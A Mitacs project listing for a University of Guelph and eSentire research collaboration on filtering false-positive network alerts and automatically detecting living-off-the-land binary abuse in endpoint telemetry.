Automated False Positive Filtering for esNetwork Alerts and Lolbin Detection for Raw Endpoint Telemetry

Pipeline alerts are beneficial to analysts to determine where their attention is needed. However, a high false positive rate leads to a noisy stream and wastes analysts’ time. The first sub-project will aim to classify the alerts as either low or high likelihood of a false positive, allowing analysts to spend their time where it is most effective.
Living-off-the-Land binaries (Lolbins) is an increasingly common technique among attackers, yet there is currently little detection for such an attack. The second sub-project will fill the gaps and provide automated detection for Lolbin abuse, and increasing detection rate beyond what is possible with out-of-the-box detection.

Faculty Supervisor:

Ali Dehghantanha

Student:

Partner:

eSentire

Discipline:

Computer science

Sector:

Cyber Security; Artificial Intelligence; Technology

University:

University of Guelph

Program:

Accelerate

Related projects

Discover more projects across a range of sectors and discipline — from AI to cleantech to social innovation.

View all
Current openings

Find the perfect opportunity to put your academic skills and knowledge into practice!

Find Projects

Mitacs Partners

The strong support from governments across Canada, international partners, universities, colleges, companies, and community organizations has enabled Mitacs to focus on the core idea that talent and partnerships power innovation — and innovation creates a better future.

Government
Academic
Industry
Innovation
International

International

Load More

International

Load More

Join a thriving innovation ecosystem.

Subscribe to our newsletter now!

Subscribe